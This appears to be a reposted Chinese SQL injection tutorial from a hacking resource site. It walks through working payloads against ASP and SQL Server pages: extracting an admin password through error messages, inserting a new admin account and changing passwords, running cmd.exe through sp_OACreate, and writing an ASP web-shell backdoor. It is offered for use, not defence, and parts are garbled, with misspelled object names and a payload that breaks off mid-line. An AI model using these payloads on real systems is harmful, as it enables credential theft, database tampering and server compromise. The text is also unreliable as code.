更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
http://jsw/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’— 返回:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’pilv’ to a column of data type int. /index.asp, line 5
也就是说用户neo的密码为pilv。 【象数据库的内容进行添加和需改】
要向数据库中提交或者修改数据,我们通常会用到INSERT和 UPDATE命令。 例如,向数据库中添加信息:
http://jsw/index.asp?id=10; INSERT INTO ’admin_login’ (’login_id’, ’login_name’, ’password’, ’details’) VALUES (666,’neo2’,’newpas5’,’NA’)—
这样我们便成功的在数据库中增加了一个用户neo2,密码为newpas5。 向数据库中修改数据用到的是UPDATE命令,例如更换neo的密码: http://jsw/index.asp?id=10; UPDATE ’admin_login’ SET ’password’ = ’newpas5’ WHERE login_name=’neo’—-
这个语句的意思我想大家一定明白了吧。 【其他】 与 OLE Automation/COM 物件相关的延伸预存程序:
SQL Server 提供了一组存取伺服器外部 OLE 物件相关的预存程序。它们分别是:
sp_OACreate sp_OADestroy sp_OAMethod sp_OAGetProperty sp_OASetProperty sp_OAGetErrorInfo sp_OAStop
你可以用它们来建立 OLE 物件(一般COM 物件就可以了,但要支援 IDispatch 介面),执行物件的方法,读取与修改属性,进行错误处理。但它们无法回应一般 OLE 或 COM 物件的事件。有了 COM/OLE 物件的建立与执行,对於控制系统来说可算是如虎添翼,无所不能了。稍举个例子,我们可以利用它来取得有兴趣的网页的原始码:
’;DECLARE @shell INT EXEC SP_OACREATE ’wscripq.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c type c:/inetpub/wwwroot/sqlinject/login.asp > c:/inetpub/wwwroot/sqlinject/test.txt’--
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
利用 scripqing.FileSystemObject 来建立一个ASP网页后门:
’;DECLARE @fs int,@fi int
EXEC SP_OACREATE ’scripqing.FileSystemObject’,@fs OUTPUT EXEC SP_OAMETHOD @fs,’CreateTextFile’,@fs
OUTPUT,’C:/InetPub/WWWRoot/SQLInject/Shell.asp’,1 EXEC SP_OAMETHOD @fs,’WriteLine’,null,’<% Set
objShell=Server.CreateObject(\ 建立 ASP 後门网页。从此透过 URL 就可以执行任何执行档,范例如下:sqlinject/shell.asp?cmd=C:/WINNT/system32/cmd.exe\ll.asp?cmd=C:/WINNT/system32/cmd.exe /c type
c:/inetpub/wwwroot/sqlinject/login.asp > c:/inetpub/wwwroot/sqlinject/test.txt
读取服务器的系统信息: ’union select @@version,1,1-- ’union select @@version,1,1--
其他相关的延伸预存程序:
xp_dirtree :显示某个目录下的子目录与档案架构 例子:xp_dirtree ’c:/inetpub/wwwroot/’
xp_ntsec_enumdomains:列出服务器域名名称 例子:xp_ntsec_enumdomains
xp_terminate_process:停掉某个执行中的程序,但赋予的参数是 Process ID 例子:xp_terminate_process 2484
?
SQL注入经典教程(珍藏版)
